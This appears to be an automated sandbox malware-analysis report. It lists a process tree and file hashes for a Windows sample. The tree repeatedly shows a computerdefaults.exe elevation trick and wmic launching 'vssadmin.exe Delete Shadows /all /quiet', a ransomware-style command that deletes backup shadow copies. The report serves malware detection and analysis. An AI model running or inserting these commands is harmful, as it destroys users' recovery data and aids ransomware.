C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:2680 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:4920
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:2748
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3484
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3288
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3484
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:320 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:1596
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:4440
-
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:2100 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:2212
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:4460
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4956
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4240
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2268
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:4840 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:5400
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:5552
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5148
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:5172 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:5332
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:5560
-
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:5260 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:5424
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:5628
-
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:5344 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:5508
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:5764
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5756
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5812
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5836
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:6016
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4708
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:5416 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:5452
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:5296
-
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:5380 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:5228
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:5684
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5752
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5696
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5804
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:5780 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:6108
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:1780
-
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:6016 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:944
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:2120
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1524
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3916
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD53ee50fb26a9d3f096c47ff8696c24321
SHA1a8c83e798d2a8b31fec0820560525e80dfa4fe66
SHA256d80ec29cb17280af0c7522b30a80ffa19d1e786c0b09accfe3234b967d23eb6f
SHA512479c0d2b76850aa79b58f9e0a8ba5773bd8909d915b98c2e9dc3a95c0ac18d7741b2ee571df695c0305598d89651c7aef2ff7c2fedb8b6a6aa30057ecfc872c5
-
Filesize
152B
MD5eaaad45aced1889a90a8aa4c39f92659
SHA15c0130d9e8d1a64c97924090d9a5258b8a31b83c
SHA2565e3237f26b6047f64459cd5d3a6bc3563e2642b98d75b97011c93e0a9bd26f3b
SHA5120db1c6bdb51f4e6ba5ef4dc12fc73886e599ab28f1eec5d943110bc3d856401ca31c05baa9026dd441b69f3de92307eb77d93f089ba6e2b84eea6e93982620e4
-
Filesize
111B
MD5807419ca9a4734feaf8d8563a003b048
SHA1a723c7d60a65886ffa068711f1e900ccc85922a6
SHA256aa10bf07b0d265bed28f2a475f3564d8ddb5e4d4ffee0ab6f3a0cc564907b631
SHA512f10d496ae75db5ba412bd9f17bf0c7da7632db92a3fabf7f24071e40f5759c6a875ad8f3a72bad149da58b3da3b816077df125d0d9f3544adba68c66353d206c
-
Filesize
6KB
MD5c3c0089ceb956bb2bcd7915799af0c46
SHA1ba534544ba0fb7f9189ffd13f8fcfb644de4d431
SHA256dbdb382a53afdde1af4b8bf6f943323cfb6ab6a151baed94bcd5c148f3228fc3
SHA51256e34842fd9a87c0312a959257d6f9ca8e9f9387e399660e2e53c8439599a5f9c3961d9f68ad23e5240586b84ee3faafb882f939e635388762eaf3e2e99d296f
-
Filesize
6KB
MD50701ce60eadecd00454b228d87ea66c4
SHA14622d2b8fa372956cc2cc47ab3653972b2ee1709
SHA25665a73568925d6748bac185e6d73c00568124c28dd90ad83fcf32200a860692b3
SHA5123dac57f28fedad5e0e4ed5f191cfa2efad2b69fae7fd0a711e642f2df52ecbbe90d89af381886dbbaed85d8daf4d0a0e72f2306d290d41a86663d8d0735196ef
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
11KB
MD503f123c3e9275e7c659ca9979b597f61
SHA1275661161ee37ab4917760e17813adf9ce17b6ae
SHA2565248ec4e1b0b7b4ebb6972791ff3120b4321be9d28f1b36612dd3a1204258f6c
SHA512a78fc86258537d285b0bde6e6ba6259ce804956697b774c6c73788f361fb006d21084d81aa75b7573c57f3e637af4581f4aa8e4b8e4901c39d610ff7415d234a
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\310091\1721151975
Filesize2KB
MD52e4acd43d24aa4bb7a8ea251a652bedc
SHA10ea3edc97d904b11c87e144e8b972dbaedbd6298
SHA2561c08a3e78b5aac0809a6a113e7d63f25be039e18354c54f2c14d9a3a35008254
SHA51252198c373ea2f7fefa935581699c117c6cfa7ce28f98095527ab27c45ecfd94fec785abb87421fa68244b0575954bbec4a2e7ec758a7fe0443fd606538be6a3a
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338388\1721151975
Filesize4KB
MD550b95a982536443692d29012bd8b1b77
SHA1003255c728b6c2ebe147c448ffea39c7303aa87f
SHA2560e97638a9ea52b7cde343c981c385d889e9e25f3f99d246bcc220da31cf0c621
SHA51246edb9ba6fb65b4c3130cf8b56f96e6a9d001157066de37253bda93ca8fa7e404c2df423f84c57accb57050c1aea576527121bb1f2ee6894afd065cedf904f45
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133656255869671905.txt
Filesize75KB
MD5e96ec580215e0f83682d5848e9658244
SHA116ae082981017f89ef53ebea185d55ab2d73cf6a
SHA25674b19e7891479bef38fed6e047caa35c282fa1b6fef396cb0c1c7aa56ef9a404
SHA512908434153d38fb01a8402e9bf75fd7755b075cec3248de1e81edb65bdb0a18522f1f3637df9bab092fc04d0da09c63dc4fa80c3e013612c0adcd6440354c039a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\5f7b5f1e01b83767.automaticDestinations-ms
Filesize6KB
MD523dc057b5d32ac2589b065af4e7ffd32
SHA1cb969ffb3cce26947622daf27b3fffe2c48a79d1
SHA2564e2efdfdbdd35ae7619cb41ee128c633d8d3d7479b21b6de402bda6a8a32bd8c
SHA51229651392f5c88006df8a9eb516f01e11198119c8643f8ffdceae8857d864ccab18cea904dd130bb1ed3b498369287f53b448c04385a223c4373efb26fe301ea6
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\9b9cdc69c1c24e2b.automaticDestinations-ms
Filesize3KB
MD5acfeb410f32835083c47f30de16c43c8
SHA16304f48b2a581c69bdcb875557a18678379de543
SHA256d6c0e4b7f45417b0a7ddd115a06228da538e05d8817a495521a8316d4a3374de
SHA512a5d2d02f2b6f3d7accf3816d1554573fe7e310b39eb3d48942c656c4a24e6cac4833409d14f2e34acb3f2ec2976ed58e47e85fafecff732a96d253aef37e5426
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms
Filesize8KB
MD514e86edb423828f718ba2d3fbb0aa215
SHA16e334ff5a51518bc13db02aa3eb5b7a68b22dcf6
SHA2568f532d220d8ae484f437fd23298ed08df714c62f3cf6725a3171713c1f53cc04
SHA5123bbbe7433162c3114170cc5bfd94ab28e1ba82f933d45aaf86e39b3e9aa42caa1532ef7bcf5ab16c92e7d1553afdeb452d6d0b3214fe161668a9cff41f0310a6
-
Filesize
1KB
MD59d1504db215c2777fc45e76c773b3d37
SHA102f920c44f2c3571b63fbf457ba444db19c2bc54
SHA256e7067ea753d3570cd727e57125e1a19bada706e067749796110d0eab39f9ef55
SHA5122c4d0543cbe2bd1e93f68fe6a001232f65598c53bc02d40820ec7ec1ab53a4631c515b5f059ba95580676822fd26d2b67b826ec9acccd43b917d167e39bc33b7
-
Filesize
332B
MD5718777534403cdcf89b5d9b5f4b2f141
SHA13f49f57f3c25d60fef6d5593c9eb5a69b74a7b29
SHA256619de8a85d1beac2e0b2c9cef08f56fc70859f6f4dd0f763d2175bdac746b0cb
SHA5128018fdbec663355db212827869eb7744f615f58db96e9a12da248f40979d28d8057bcab945381e43cb346e0b3ded14743efd8b47727ca98e32e430b6519d7440
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e